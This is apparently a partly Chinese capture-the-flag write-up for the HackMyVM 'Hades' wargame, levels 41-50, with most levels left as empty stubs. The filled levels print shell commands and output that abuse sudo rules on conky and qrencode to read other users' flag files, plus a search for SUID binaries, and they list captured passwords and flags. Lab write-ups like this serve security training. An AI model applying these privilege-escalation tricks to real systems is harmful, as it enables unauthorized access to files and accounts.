Hades 41-50

User -

flag - 41

任务目标

行动

User -

flag - 42

任务目标

行动

Exploit it

athena@hades:~$ cat /etc/hosts
127.0.0.1       localhost
::1     localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.66.0.66     hades
127.0.0.1       hades.hmv
127.0.0.1       whatsmypass.hmv
athena@hades:~$ curl whatsmypass.hmv
HXisrOPSdTcSSTEyyaLn

User - nyx

flag - 43

^BdYvJtfaTyfaliZPBkG^

任务目标

mission.txt

User pallas has her desktop tuned with conky.

行动

ls -lah

drwxr-x--- 2 root nyx  4.0K Jul 26  2023 .
drwxr-xr-x 1 root root 4.0K Jul 26  2023 ..
-rw-r--r-- 1 nyx  nyx   220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 nyx  nyx  3.5K Apr 23  2023 .bashrc
-rw-r--r-- 1 nyx  nyx   807 Apr 23  2023 .profile
-rw-r----- 1 root nyx    22 Jul 26  2023 flagz.txt
-rw-r----- 1 root nyx   171 Jul 26  2023 mission.txt

使用以下配置文件

conky.config = {
    alignment = 'top_left',
    background = false,
    border_width = 1,
    cpu_avg_samples = 2,
    default_color = 'white',
    default_outline_color = 'white',
    default_shade_color = 'white',
    double_buffer = true,
    draw_borders = false,
    draw_graph_borders = true,
    draw_outline = false,
    draw_shades = false,
    extra_newline = false,
    gap_x = 60,
    gap_y = 60,
    minimum_height = 5,
    minimum_width = 5,
    net_avg_samples = 2,
    no_buffers = true,
    out_to_console = true,
    out_to_ncurses = false,
    out_to_stderr = false,
    out_to_x = false,
    own_window = true,
    own_window_class = 'Conky',
    own_window_type = 'desktop',
    show_graph_range = false,
    show_graph_scale = false,
    stippled_borders = 0,
    update_interval = 1.0,
    uppercase = false,
    use_spacer = 'none',
    use_xft = true,
}

conky.text = [[
${color grey}Info:$color ${scroll 32 Conky $conky_version - $sysname $nodename $kernel $machine}
$hr
${color grey}Uptime:$color $uptime
${color grey}Frequency (in MHz):$color $freq
${color grey}Frequency (in GHz):$color $freq_g
${color grey}RAM Usage:$color $mem/$memmax - $memperc% ${membar 4}
${color grey}Swap Usage:$color $swap/$swapmax - $swapperc% ${swapbar 4}
${color grey}CPU Usage:$color $cpu% ${cpubar 4}
${color grey}Processes:$color $processes  ${color grey}Running:$color $running_processes
$hr
${color grey}File systems:
 / $color${fs_used /}/${fs_size /} ${fs_bar 6 /}
${color grey}Networking:
Up:$color ${upspeed} ${color grey} - Down:$color ${downspeed}
$hr
${color grey}Name              PID     CPU%   MEM%
${color lightgrey} ${top name 1} ${top pid 1} ${top cpu 1} ${top mem 1}
${color lightgrey} ${top name 2} ${top pid 2} ${top cpu 2} ${top mem 2}
${color lightgrey} ${top name 3} ${top pid 3} ${top cpu 3} ${top mem 3}
${color lightgrey} ${top name 4} ${top pid 4} ${top cpu 4} ${top mem 4}

${head /pwned/pallas/flagz.txt 30}
]]

Exploit it

nyx@hades:~$ sudo -l
Matching Defaults entries for nyx on hades:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User nyx may run the following commands on hades:
    (pallas) NOPASSWD: /usr/bin/conky
nyx@hades:~$ nano /var/tmp/tessssssst-conky.conf
nyx@hades:~$ sudo -u pallas /usr/bin/conky -c /var/tmp/tessssssst-conky.conf
conky: drawing to single buffer
conky: invalid setting of type 'table'
Info:
Uptime: 193d 23h 55m
Frequency (in MHz): 2400
Frequency (in GHz): 2.40
RAM Usage: 1.01GiB/1.94GiB - 52% #####.....
Swap Usage: 0B/0B - 0% ..........
CPU Usage: 6% #.........
Processes: 106  Running: 0
File systems:
 / 8.75GiB/18.8GiB #####.....
Networking:
Up: 0B  - Down: 0B
Name              PID     CPU%   MEM%
 bash             4185872   0.00   0.13
 bash             4185829   0.00   0.18
 script           4185828   0.00   0.05
 sh               4185827   0.00   0.04
^irzKewMCfnhnIMTCJlW^

User - pallas

flag - 44

^irzKewMCfnhnIMTCJlW^

任务目标

mission.txt

User pandora likes squares.

行动

ls -lah

-rw-r--r-- 1 pallas pallas  220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 pallas pallas 3.5K Apr 23  2023 .bashrc
-rw-r--r-- 1 pallas pallas  807 Apr 23  2023 .profile
-rw-r----- 1 root   pallas   22 Jul 26  2023 flagz.txt
-rw-r----- 1 root   pallas  145 Jul 26  2023 mission.txt

Exploit it

pallas@hades:~$ sudo -u pandora /usr/bin/qrencode -r /pwned/pandora/flagz.txt -o /var/tmp/tesssssssst-pandora.txt; base64 /var/tmp/tesssssssst-pandora.txt
iVBORw0KGgoAAAANSUhEUgAAAGMAAABjAQMAAAC19SzWAAAABlBMVEUAAAD///+l2Z/dAAAAAnRS
TlP//8i138cAAAAJcEhZcwAACxIAAAsSAdLdfvwAAADtSURBVDiNzdQxjsQgDAVQIwp3kwsg5RrT
cSW4wLC5wOZKdFwDiQtAR4HWazQrbZqsU8xI6yoPyUr84wToWPCPVQE8DRVBSWo0fAef+EJSNM4a
lbj7gpD7LumBul0RDYfUfp/sVHO+ZPxh2jPNiiMcEjxTtRDSuvesJHHtHBuZIIn7bjgW0iQKS7Um
RD4Q1GL2vXzh2kR12tL6YfUuiSI8AG6Qg6hUZisvl6R6H7wCXIskroqcmd4k8bsNVFr6SfcPzX2x
HINRonhb79nB8w6CAhnA9ZI6OMiLqPn9lU80ong+h3pPtEl6/7/nFfoGYZyvP9kwcFcAAAAASUVO
RK5CYII=
# ^pjDuPNQVgyhgigOIiwm^

解码即可

User - pandora

flag -

^pjDuPNQVgyhgigOIiwm^

任务目标

mission.txt

User penelope lets us do something...

行动

ls -lah

-rw-r--r-- 1 pandora pandora  220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 pandora pandora 3.5K Apr 23  2023 .bashrc
-rw-r--r-- 1 pandora pandora  807 Apr 23  2023 .profile
-rw-r----- 1 root    pandora   22 Jul 26  2023 flagz.txt
-rw-r----- 1 root    pandora  155 Jul 26  2023 mission.txt

尝试搜索这个用户的文件

Exploit it

gaia@hades:~$ find / -user penelope -type f -exec ls -lah {} + 2>/dev/null
-r-------- 1 penelope penelope  21 Jul 30  2021 /etc/pene.conf
-rwsr-sr-x 1 penelope pandora  68K Jul 26  2023 /usr/bin/getty

User -

flag -

任务目标

行动

User -

flag -

任务目标

行动

User -

flag -

任务目标

行动

User -

flag -

任务目标

行动

User -

flag -

任务目标

行动

User -

flag -

任务目标

行动

User -

flag -

任务目标

行动